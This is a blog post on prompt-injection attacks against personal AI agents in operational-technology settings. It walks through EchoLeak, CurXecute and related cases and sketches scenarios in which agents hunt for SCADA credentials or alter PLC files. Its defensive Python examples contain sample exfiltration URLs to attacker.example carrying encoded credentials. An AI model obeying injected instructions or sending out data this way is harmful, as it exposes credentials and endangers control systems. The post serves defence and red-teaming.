In 2025, security researchers demonstrated an attack that should concern everyone in OT.

They sent a single email to a Microsoft 365 user who had Copilot enabled. The email looked normal. But hidden inside it were instructions written for the AI, not the human.

When Copilot processed that email, those hidden instructions overrode its normal behavior. The AI then searched through the user's OneDrive, SharePoint, Teams, and email history, found sensitive data, encoded it into an image URL, and sent it to the attacker's server.

Zero clicks. No user interaction after the email was delivered. The engineer never knew it happened.

This isn't hypothetical. It's CVE-2025-32711 — nicknamed "EchoLeak" — rated CVSS 9.3 by Microsoft. The first documented zero-click prompt injection exploit in a production AI system.
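As an added illustration (not code from the original post, and not Microsoft's EchoLeak fix), here is an output-side filter of the kind that closes the channel described above: before an agent's reply is rendered, every URL it contains is checked against an allowlist of tenant hosts, and URLs that carry long, high-entropy values in their query string or path are flagged as likely smuggled data. The allowlisted hosts, the sample reply and the secret it encodes are all constructed for the example.

```python
"""Output-side filter for an agent's rendered reply: finds URLs embedded as markdown
images, links or bare text, checks the host against an allowlist and flags values that
look like encoded data riding in the URL. Constructed example, not any product's code."""
import base64
import math
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Assumption: tenant-approved hosts that rendered output may reference.
ALLOWED_HOSTS = {"sharepoint.example.com", "teams.example.com"}

MD_IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")      # ![alt](url)
MD_LINK_RE = re.compile(r"(?<!!)\[[^\]]*\]\(([^)\s]+)\)")  # [text](url)
BARE_URL_RE = re.compile(r"https?://[^\s)\]>\"']+")        # plain http(s)://...


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_encoded_payload(value: str) -> bool:
    """Long, high-entropy value in a base64/hex-style alphabet: the shape of smuggled data."""
    if len(value) < 24 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", value):
        return False
    return shannon_entropy(value) > 3.5


def analyze_url(url: str) -> list[str]:
    """Reasons this URL should not leave the agent unreviewed (empty list = clean)."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host not allowlisted: {host or '<none>'}")
    for key, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for v in values:
            if looks_like_encoded_payload(v):
                reasons.append(f"query parameter {key!r} carries {len(v)} chars of encoded-looking data")
    for segment in parsed.path.split("/"):
        if looks_like_encoded_payload(segment):
            reasons.append(f"path segment carries {len(segment)} chars of encoded-looking data")
    return reasons


def scan_agent_output(text: str) -> list[dict]:
    """Every distinct URL in the reply, with the syntax it was found in and its reasons."""
    findings, seen = [], set()
    for kind, regex in (("image", MD_IMAGE_RE), ("link", MD_LINK_RE), ("bare_url", BARE_URL_RE)):
        for m in regex.finditer(text):
            url = m.group(1) if regex.groups else m.group(0)
            if url in seen:
                continue
            seen.add(url)
            reasons = analyze_url(url)
            if reasons:
                findings.append({"kind": kind, "url": url, "reasons": reasons})
    return findings


def sanitize_output(text: str) -> tuple[str, list[dict]]:
    """Replace every flagged URL so no renderer can fetch it; return the findings for logging."""
    findings = scan_agent_output(text)
    for f in findings:
        host = urlparse(f["url"]).hostname or "unknown"
        text = text.replace(f["url"], f"[blocked: {host}]")
    return text, findings


# Constructed sample of what an exfiltrating reply looks like: a legitimate link into
# the tenant, plus an image whose URL carries base64-encoded data for an attacker host.
_SECRET = b"scada_user=eng01;scada_pass=Plc!2029;vpn_host=10.20.30.40;token=a8f3"
SAMPLE_REPLY = (
    "Here is the summary you asked for. Source: "
    "[shift notes](https://sharepoint.example.com/sites/ops/shift-notes.docx)\n"
    "![status](https://attacker.example/img.png?d="
    + base64.urlsafe_b64encode(_SECRET).decode() + ")\n"
)

if __name__ == "__main__":
    clean, findings = sanitize_output(SAMPLE_REPLY)
    for f in findings:
        print(f["kind"], f["url"][:60], f["reasons"])
    print(clean)
```

Run it and the SharePoint link survives while the image pointing at the constructed attacker host is replaced before any renderer can fetch it. The same check belongs on HTML `<img>` tags and on auto-generated link previews, since those are the other places a client issues a request without the user clicking.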

But that demo was in an office environment. Outlook, Word, SharePoint.

When the same vulnerability lives on the laptop of someone who connects to PLCs, configures HMIs, and manages remote access to operational technology — well, the conversation changes.

What Exactly Is a "Personal AI Agent"?

It's not ChatGPT in a browser. That's a chatbot — you type, it responds, it forgets, you move on.

A personal AI agent is different. It lives on your device. It remembers your conversations, your preferences, your work patterns. It connects to your email, your calendar, your cloud storage, your messaging apps. It can search things, read things, send things, run scripts, call APIs.

And it's getting more capable every month.

Some are built into your OS — Apple Intelligence, Samsung Galaxy AI, Microsoft Copilot — shipping on billions of devices. Others are open-source platforms you run yourself, like OpenClaw (which crossed 346,000 GitHub stars by April 2026) or NVIDIA's NemoClaw — an enterprise security platform built specifically to run personal AI agents more safely on-premises.

What they all have in common: they can see what you see, they know what you know, and they can do things you authorized without you being present.

That last part is what keeps security professionals awake at night.

Three Things That Make This Different

1. They Have Memory

A chatbot doesn't know you from one session to the next. A personal agent does. Over time, it builds a profile as rich as any human colleague might have about you.

Attackers figured out you can poison that memory — feed the agent bad information that sticks around, and it starts making decisions based on lies you planted weeks ago.

2. They Have Tool Access

This is the big one. AI agents don't just generate text — they call tools. They read your email, search your cloud storage, query databases, send messages, execute scripts.

Every integration is an attack vector. If the agent has OAuth tokens to your M365, Google Workspace, or Salesforce accounts, compromising its behavior is the same as compromising your credentials across all of those platforms simultaneously.

3. They Have Autonomy

Some need approval for every action. Others execute multi-step workflows independently.

The industry calls this "bounded autonomy." The problem is that boundaries are hard to define correctly, and attackers have been very good at finding the gaps between what you think your agent will do and what it actually does.

OWASP ranks excessive agency and tool misuse among the top risks for agentic AI. The CVEs back that up.

Let's Get Speculative: The Workplace of 2028-2030

Here's where it gets interesting.

Picture this: It's 2029. Every worker in your facility has a personal AI running locally on their workstation.

The day shift operator asks "what changed overnight?" Their AI checks the SCADA alarm log, reads shift notes, and flags a firmware update for the DCS controller — already cross-referenced against known CVEs.

The maintenance engineer's scheduling assistant finds a conflict between a PLC firmware upgrade and a safety inspection window.

The plant manager gets a summary of last quarter's incident trends, cross-referenced from thirty-seven PDFs and the alarm log.

Sounds great, right?

Here's the catch.

Every one of those workers is an attack surface. The operator's AI read firmware release notes — what if those notes were on a compromised vendor site and contained hidden instructions? The scheduling AI reads the work order system — what if someone poisoned that data?

In 2029, your facility won't just have human employees with badges and keycards. You'll have AI agents with the same credentials, the same access, the same trust — and they're vulnerable to attacks that don't exist in any traditional security framework.

A phishing email doesn't need to fool a human anymore. It just needs to contain text that an AI will misinterpret. And AIs misinterpret things in ways humans never would.

The social engineering playbook has changed. You don't need to convince an engineer to click a link. You just need to send them a document their AI will read — and the AI will do the clicking for them.

What's Actually Being Exploited Right Now

CVE-2025-32711 (EchoLeak) — A crafted email sent to a Copilot user triggered automatic data exfiltration across Microsoft 365. CVSS 9.3. Zero clicks. Patched mid-2025.

CVE-2025-54135 (CurXecute) — A malicious README in a code repository caused Cursor IDE to execute commands on the developer's machine. Remote code execution. Cursor versions prior to 1.3 affected.

CVE-2025-53773 — Malicious prompts in public code comments compromised GitHub Copilot, instructing it to modify local workspace settings and enable unattended command execution.

At Black Hat USA 2025, Zenity Security demonstrated these same attack patterns across agents — ChatGPT connected to Google Drive, Microsoft Copilot Studio, Salesforce Agentforce, and Google Gemini. In the ChatGPT demo, a rogue document instructed the agent to search the victim's Drive for API keys and exfiltrate them via crafted Markdown image links.

Bruce Schneier, October 2025: "AI agents are now hacking computers. They're getting better at all phases of cyberattacks, faster than most of us expected."

University of Illinois researchers demonstrated that LLM agents could autonomously perform multi-step attacks including SQL injection — succeeding on over 70% of vulnerabilities tested.

These aren't hypotheticals. They're CVEs. They're documented.

And in OT environments, the documents that carry these attacks — vendor manuals, firmware release notes, support tickets, change request forms — are the bread and butter of daily operations.

The OT Angle: Why This Is Worse for Control Systems

In IT, a compromised AI agent might leak emails or financial records. Painful, expensive, nobody gets hurt.

In OT, a compromised agent might alter setpoints on a pressure relief system. Disable safety interlocks. Hide alarm conditions from operators.

The physical-world consequences change the entire risk calculus.

And here's the uncomfortable truth: your engineers already have personal AI agents. Even if you haven't approved them.

A control systems engineer with Copilot on their laptop has, in effect, connected an AI agent to your OT environment. The agent inherits the engineer's permissions — which, for control systems engineers, tend to be extensive.

In December 2025, CISA published joint guidance with the NSA, FBI, and security agencies from seven other countries — titled "Principles for the Secure Integration of Artificial Intelligence in Operational Technology." Four principles:

  1. Understand AI
  2. Assess AI integration in the OT domain
  3. Establish AI governance frameworks
  4. Embed safety and security practices into AI-enabled OT systems

The guidance explicitly states that AI "should augment, not autonomously control, safety-critical actions in ICS/OT." These weren't written for personal AI agents specifically. But they apply — because any AI with access to your OT systems needs to be governed.

The Attack Scenarios

The SCADA Credential Hunt — An attacker sends an email with embedded prompt injection to an engineer whose personal AI summarizes their inbox. The AI reads it. Searches cloud storage for SCADA credentials, VPN configs, remote access tokens. Ships everything to the attacker. The engineer never sees a thing.

The Silent Config Change — An AI agent reads a vendor manual containing hidden instructions. Silently modifies HMI configurations or PLC logic files — creating a latent backdoor the engineer didn't put there.

The Compromised Integrator — A systems integrator's AI agent gets poisoned via a project specification. The integration package delivered to the customer carries a compromise introduced by the integrator's own assistant, not by any human.

The False Positive Cascade — An AI agent analyzing predictive maintenance data gets pushed into false conclusions through data poisoning. Maintenance skipped on critical equipment. Physical-world safety implications.

The common thread: no human was fooled. No engineer clicked a link. The AI read something it shouldn't have and did something it shouldn't have.

What You Can Do About It Before Monday

You're not going to ban personal AI agents. No more than you banned smartphones in 2008. So here's what you do instead.

1. Find out what's already happening. Ask your engineers what AI tools they're using. Don't audit. Just ask. Most will tell you because they don't think it's a problem — and in their minds, it isn't. That's why it's dangerous.

2. Lock down account access. If an engineer's Microsoft account is connected to Copilot, does it also have access to SCADA vendor portals? If so, that's too broad.

3. Treat every document like it's adversarial — for your AI. Any file an AI might read should be assumed potentially hostile. Vendor manuals, firmware release notes, support tickets, change requests.

4. Add AI agents to your threat models. What systems can they reach? What content do they consume? What happens if someone compromises them? What's the physical-world impact? OWASP's GenAI Security Top 10 is a starting point.

5. Keep a human in the loop. If AI touches anything OT-relevant, require explicit human approval for actions that modify data or send information outside the organization.

6. Red-team for AI specifically. The Black Hat demonstrations showed these attacks are practical, repeatable, and high-impact. Test your people's AI agents for indirect prompt injection. Fix what breaks.
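As an added example, not from the post or any vendor's product, the gate below is one way to implement steps 2 and 5 (and the "bounded autonomy" the article mentions earlier): every tool call the agent proposes is classified by its effect, read-only calls proceed and are logged, modifications and sends to destinations outside the organization are parked until a human approves that specific call, and writes under OT project paths are refused outright. The tool catalogue, internal domains, protected path prefixes and the sequence of proposed calls are all constructed for the example.

```python
"""Policy gate between a personal agent and its tools. Each proposed call is classified
by effect (read / modify / send), checked against the agent's allowlist, and held for
explicit human approval when it changes data or moves information outside the
organization. Constructed illustration, not any vendor's API."""
from dataclasses import dataclass, field
from enum import Enum
from urllib.parse import urlparse


class Effect(Enum):
    READ = "read"      # observes data only
    MODIFY = "modify"  # changes files, settings or records
    SEND = "send"      # moves information to another party


# Assumption: a tool catalogue with a declared effect class per tool.
TOOL_EFFECTS = {
    "search_mail": Effect.READ,
    "read_file": Effect.READ,
    "write_file": Effect.MODIFY,
    "send_mail": Effect.SEND,
    "http_post": Effect.SEND,
}

# Assumption: domains that count as inside the organization.
INTERNAL_DOMAINS = {"example.com"}

# Assumption: path prefixes holding OT project content the agent may never write.
PROTECTED_PATHS = ("/ot/", "/plc/", "/hmi/")


@dataclass
class Decision:
    allowed: bool          # may the call execute now?
    needs_approval: bool   # parked until a human approves it
    reason: str


def destination_domain(dest: str) -> str:
    """Domain part of a mail address or URL, lower-cased."""
    if "@" in dest:
        return dest.rsplit("@", 1)[1].lower()
    if "://" in dest:
        return (urlparse(dest).hostname or "").lower()
    return dest.lower()


def is_internal(domain: str) -> bool:
    return any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


@dataclass
class ToolGate:
    allowed_tools: set
    approvals: dict = field(default_factory=dict)  # call_id -> True once a human approved
    audit: list = field(default_factory=list)      # every decision, kept for review

    def approve(self, call_id: str) -> None:
        self.approvals[call_id] = True

    def _hold(self, call_id: str, what: str) -> Decision:
        if self.approvals.get(call_id):
            return Decision(True, False, f"human-approved: {what}")
        return Decision(False, True, f"awaiting human approval: {what}")

    def decide(self, call_id: str, tool: str, args: dict) -> Decision:
        if tool not in TOOL_EFFECTS or tool not in self.allowed_tools:
            d = Decision(False, False, f"{tool} is not available to this agent")
        else:
            effect = TOOL_EFFECTS[tool]
            if effect is Effect.READ:
                d = Decision(True, False, "read-only, allowed and logged")
            elif effect is Effect.MODIFY:
                path = args.get("path", "")
                if path.startswith(PROTECTED_PATHS):
                    d = Decision(False, False, f"{path} is protected OT content")
                else:
                    d = self._hold(call_id, f"modify {path}")
            else:  # Effect.SEND
                dest = args.get("to") or args.get("url") or ""
                if is_internal(destination_domain(dest)):
                    d = Decision(True, False, f"internal recipient {dest}")
                else:
                    d = self._hold(call_id, f"send to external destination {dest}")
        self.audit.append((call_id, tool, d))
        return d


def run_scenario() -> list:
    """Constructed sequence of calls an agent proposed after reading a poisoned email."""
    gate = ToolGate(allowed_tools=set(TOOL_EFFECTS))
    proposed = [
        ("c1", "search_mail", {"query": "VPN config"}),
        ("c2", "read_file", {"path": "/ot/plc/line3.acd"}),
        ("c3", "http_post", {"url": "https://attacker.example/collect", "body": "vpn config text"}),
        ("c4", "write_file", {"path": "/hmi/screens/main.xml", "data": "<screen/>"}),
        ("c5", "send_mail", {"to": "ops-lead@example.com", "body": "overnight summary"}),
        ("c6", "write_file", {"path": "/home/eng01/notes.md", "data": "shift notes"}),
    ]
    results = []
    for call_id, tool, args in proposed:
        d = gate.decide(call_id, tool, args)
        results.append((call_id, tool, d.allowed, d.needs_approval))
    # The engineer reviews the parked calls, approves the note file (c6) and leaves
    # the external post (c3) unapproved; only c6 is re-submitted and executes.
    gate.approve("c6")
    d = gate.decide("c6", "write_file", proposed[5][2])
    results.append(("c6", "write_file", d.allowed, d.needs_approval))
    return results


if __name__ == "__main__":
    for row in run_scenario():
        print(row)
```

The approval is keyed to the individual call, not to the tool, so an injected instruction cannot reuse an earlier "yes" for a different destination; and the gate's audit list is the record to pull when red-teaming in step 6, because a parked external send is exactly the artefact an indirect prompt injection leaves behind.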

The Bottom Line

Personal AI agents aren't going away. You can't ban them. So you need to govern them.

The same way you govern human access. The same way you've been doing security work for twenty years — just with a new actor on the board that doesn't think like humans do, can be manipulated through text instead of persuasion, and has the speed to do in seconds what a human attacker would take weeks to accomplish.

The AI agent is not a new category of threat. It's a new vector for the threats you already know. Credential theft. Social engineering. Supply chain compromise. Lateral movement.

But it's a vector growing exponentially, and one that most OT security teams haven't factored into their risk models yet.

Better to look at it now — before your engineer's AI assistant reads a compromised vendor manual and quietly reconfigures the one safety system you've been sleeping well about.

---

*Originally published at: https://controlsystemssecurity.com/your-ai-assistant-has-the-keys-to-your-kingdom/*